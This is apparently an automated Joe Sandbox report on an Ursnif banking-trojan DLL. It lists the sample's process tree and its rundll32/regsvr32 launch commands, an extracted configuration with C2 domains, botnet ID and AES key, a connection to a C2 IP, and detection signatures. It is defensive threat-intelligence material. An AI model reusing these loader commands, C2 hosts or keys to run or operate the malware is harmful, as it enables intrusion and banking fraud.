Edit tour

Windows Analysis Report
c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe

Overview

General Information

Sample Name:	c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe (renamed file extension from exe to dll)
Analysis ID:	753126
MD5:	590d96a7be55240ad868ebec78ce38f2
SHA1:	2aaf8acb010dfe83b808d7cc77f6821aaf44f3d2
SHA256:	846a8058cda54207aebb885f99dab0eab57529eb8dd94a3d57bbde2e93c4aad4
Tags:	exe
Infos:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Ursnif

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Queries the volume information (name, serial number etc) of a device

Tries to load missing DLLs

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 2512 cmdline: loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)

conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5972 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

rundll32.exe (PID: 5932 cmdline: rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 3308 cmdline: cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1716 cmdline: cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

regsvr32.exe (PID: 5952 cmdline: regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll MD5: D78B75FC68247E8A63ACBA846182740E)

rundll32.exe (PID: 5960 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 6072 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 2668 cmdline: rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Ursnif

{"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: loaddll64.exe PID: 2512	JoeSecurity_Ursnifv4	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 5952	JoeSecurity_Ursnifv4	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5932	JoeSecurity_Ursnifv4	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 5960	JoeSecurity_Ursnifv4	Yara detected Ursnif	Joe Security

Snort Signatures

ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou) - Source IP: 192.168.2.7 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.78.8.8.860326532039637 11/24/22-10:49:03.324067
SID:	2039637
Source Port:	60326
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

ReversingLabs: Detection: 21%

Antivirus detection for URL or domain

Source: https://higmon.cyou/index.html7b9a	Avira URL Cloud: Label: malware
Source: https://higmon.cyou/index.html	Avira URL Cloud: Label: malware
Source: https://higmon.cyou	Avira URL Cloud: Label: malware
Source: https://higmon.cyou/	Avira URL Cloud: Label: malware
Source: https://prises.cyou	Avira URL Cloud: Label: malware

Source: 4.2.rundll32.exe.1c7146f2900.1.raw.unpack

Malware Configuration Extractor: Ursnif {"c2_domain": ["https://higmon.cyou", "https://prises.cyou"], "botnet": "202208151", "aes key": "VHpr3Unea0fVqBYc", "sleep time": "1", "request time": "10", "host keep time": "2", "host shift time": "1"}

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 45.8.147.179 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: higmon.cyou

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2039637 ET TROJAN Observed DNS Query to Ursnif Domain (higmon .cyou) 192.168.2.7:60326 -> 8.8.8.8:53

Source: Joe Sandbox View

ASN Name: VMAGE-ASRU VMAGE-ASRU

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

Source: loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://higmon.cyou
Source: rundll32.exe, 00000004.00000002.764882863.000001C71471F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://higmon.cyou/
Source: rundll32.exe, 00000004.00000002.764961178.000001C714740000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://higmon.cyou/index.html
Source: rundll32.exe, 00000004.00000002.764723934.000001C7146DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://higmon.cyou/index.html7b9a
Source: rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://higmon.cyouhttps://prises.cyouR
Source: loaddll64.exe, 00000000.00000002.265171862.000001FF43732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246612763.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765260621.000001C716532000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247438709.000001817DA62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://http://Mozilla/5.0
Source: rundll32.exe, rundll32.exe, 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmp, c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll	String found in binary or memory: https://my.tealiumiq.com/urest/legacy/tagcompanion/getProfile?utid=
Source: loaddll64.exe, 00000000.00000002.265165048.000001FF43730000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.246608034.0000000002F40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765253557.000001C716530000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.765191980.000001C71618E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.247434802.000001817DA60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://prises.cyou

Source: unknown

DNS traffic detected: queries for: higmon.cyou

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5960, type: MEMORYSTR

Source: C:\Windows\System32\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000508C	0_2_000000018000508C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004A14	0_2_0000000180004A14
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180003A24	0_2_0000000180003A24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001844	0_2_0000000180001844
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009C54	0_2_0000000180009C54
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006344	0_2_0000000180006344
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005748	0_2_0000000180005748
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002B60	0_2_0000000180002B60
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180008D78	0_2_0000000180008D78
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800027D4	0_2_00000001800027D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018000508C	3_2_000000018000508C
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180004A14	3_2_0000000180004A14
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180003A24	3_2_0000000180003A24
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001844	3_2_0000000180001844
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180009C54	3_2_0000000180009C54
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180006344	3_2_0000000180006344
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005748	3_2_0000000180005748
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180002B60	3_2_0000000180002B60
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180008D78	3_2_0000000180008D78
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800027D4	3_2_00000001800027D4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180004A14	4_2_0000000180004A14
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180001844	4_2_0000000180001844
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018000508C	4_2_000000018000508C
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180006344	4_2_0000000180006344
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800027D4	4_2_00000001800027D4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180003A24	4_2_0000000180003A24
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180009C54	4_2_0000000180009C54
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180005748	4_2_0000000180005748
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180002B60	4_2_0000000180002B60
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180008D78	4_2_0000000180008D78
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000508C	5_2_000000018000508C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004A14	5_2_0000000180004A14
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180003A24	5_2_0000000180003A24
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180001844	5_2_0000000180001844
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180009C54	5_2_0000000180009C54
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180006344	5_2_0000000180006344
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005748	5_2_0000000180005748
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002B60	5_2_0000000180002B60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180008D78	5_2_0000000180008D78
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800027D4	5_2_00000001800027D4

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,	0_2_0000000180005CA4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,	3_2_0000000180005CA4
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,	4_2_0000000180005CA4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180005CA4 CreateFileW,RtlInitUnicodeString,NtQueryDirectoryFile,CloseHandle,GetLastError,	5_2_0000000180005CA4

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

ReversingLabs: Detection: 21%

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,FgnfMvSNFULXZx	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll,KVpawdrrKTUjeZuk	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll",#1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "echo Commands" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe cmd /c "dir" >> C:\Users\user~1\AppData\Local\Temp\AEC4.tmp	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3828:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ManagerMui
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_01

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user~1\AppData\Local\Temp\AEC4.tmp

Jump to behavior

Source: rundll32.exe	String found in binary or memory: ine .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline
Source: rundll32.exe	String found in binary or memory: ,.input-group .form-control:first-child{border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-chi
Source: rundll32.exe	String found in binary or memory: 0 1px 1px rgba(0,0,0,.075)}.has-error .form-control:focus{border-color:#843534;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483}.has-error .input-group-addon{color:#a94442;background-color:#f2dede;border-color:#a94442}.has-error .form-control-feedba
Source: rundll32.exe	String found in binary or memory: y:inline-block!important}}@media print{.hidden-print{display:none!important}}.ui-helper-hidden{display:none}.ui-helper-hidden-accessible{border:0;clip:rect(0 0 0 0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.ui-helper-reset{m
Source: rundll32.exe	String found in binary or memory: ble;vertical-align:middle}.navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}.navbar-form .input-group>.form-control{width:100%}.navbar-form .control-label{margin-bottom:0;
Source: rundll32.exe	String found in binary or memory: rgin:0;padding:0;border:0;outline:0;line-height:1.3;text-decoration:none;font-size:100%;list-style:none}.ui-helper-clearfix:after,.ui-helper-clearfix:before{content:"";display:table}.ui-helper-clearfix:after{clear:both}.ui-helper-clearfix{zoom:1}.ui-helper-zfi
Source: rundll32.exe	String found in binary or memory: don,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-gr
Source: rundll32.exe	String found in binary or memory: images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;background-size:28px auto}.wrapper{position:relative;overflow:hidden;width:100%;height:100%;min-width:320px}.content{margin:0 auto;background-color:#fff}@media only screen and (max-widt
Source: rundll32.exe	String found in binary or memory: ing:3px}.ui-terminal-input{border:0 none;background-color:transparent;color:inherit;padding:0;margin:0 0 0 2px;width:75%;outline:0;vertical-align:baseline}.ui-terminal-command{margin-left:2px;-moz-margin-start:3px}.ui-terminal-input::-ms-clear{display:none}.ui
Source: rundll32.exe	String found in binary or memory: l,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group-a
Source: rundll32.exe	String found in binary or memory: cess .form-control{border-color:#3c763d;box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-success .form-control:focus{border-color:#2b542c;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}.has-success .input-group-addon{color:#3c763d;background-color
Source: rundll32.exe	String found in binary or memory: :inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}.has-warning .input-group-addon{color:#8a6d3b;background-color:#fcf8e3;border-color:#8a6d3b}.has-warning .form-control-feedback{color:#8a6d3b}.has-error .checkbox,.has-error .checkbox-inline,.has-error.checkbox
Source: rundll32.exe	String found in binary or memory: addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group-addon:first-c
Source: rundll32.exe	String found in binary or memory: datatable .ui-column-resizer{display:block;position:absolute!important;top:0;right:0;margin:0;width:8px;height:100%;padding:0;cursor:col-resize;border:1px solid transparent}.ui-datatable .ui-column-resizer-helper{width:1px;position:absolute;z-index:10;display:
Source: rundll32.exe	String found in binary or memory: up-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group
Source: rundll32.exe	String found in binary or memory: rol,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-
Source: rundll32.exe	String found in binary or memory: -vertical .slick-slide{display:block;height:auto;border:1px solid transparent}.slick-arrow.slick-hidden{display:none}.slick-loading .slick-list{background:#fff url(../static/uploads/assets/images/loader.gif) 50% no-repeat}@font-face{font-family:slick;src:url(.
Source: rundll32.exe	String found in binary or memory: nput-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-con
Source: rundll32.exe	String found in binary or memory: dius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{font-size:0;white-space:nowrap}.input-group-btn,.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.in
Source: rundll32.exe	String found in binary or memory: yphicon-play:before{content:"\e072"}.glyphicon-pause:before{content:"\e073"}.glyphicon-stop:before{content:"\e074"}.glyphicon-forward:before{content:"\e075"}.glyphicon-fast-forward:before{content:"\e076"}.glyphicon-step-forward:before{content:"\e077"}.glyphico
Source: rundll32.exe	String found in binary or memory: ute;top:50%;cursor:pointer}.ui-lightbox-nav-left{left:0}.ui-lightbox-nav-right{right:0}.ui-lightbox-loading{background:url(images/loading.gif) #000 50% no-repeat}.ui-lightbox-caption{padding:.2em .4em;display:none}.ui-lightbox-caption-text{margin:.3em 0 .1em;f
Source: rundll32.exe	String found in binary or memory: ;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-contr
Source: rundll32.exe	String found in binary or memory: ay:block;width:100%}.loading{position:fixed;top:0;left:0;right:0;bottom:0;background-color:#fff;background-image:url(/static/uploads/assets/images/loader.gif);background-position:50% 50%;background-repeat:no-repeat;opacity:0;visibility:hidden;z-index:100}.load
Source: rundll32.exe	String found in binary or memory: tn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30p

Source: classification engine

Classification label: mal80.troj.evad.winDLL@20/1@1/1

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800112EE push rax; ret	0_2_00000001800112EF
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001112F push rcx; iretd	0_2_0000000180011130
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800112EE push rax; ret	3_2_00000001800112EF
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_000000018001112F push rcx; iretd	3_2_0000000180011130
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00007FFE354849F8 push rbx; retf	4_2_00007FFE354849F9
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000001800112EE push rax; ret	4_2_00000001800112EF
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000000018001112F push rcx; iretd	4_2_0000000180011130
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800112EE push rax; ret	5_2_00000001800112EF
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001112F push rcx; iretd	5_2_0000000180011130

Source: c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Static PE information: section name: .sedt

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.dll

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: Process Memory Space: loaddll64.exe PID: 2512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5932, type: MEMORYSTR
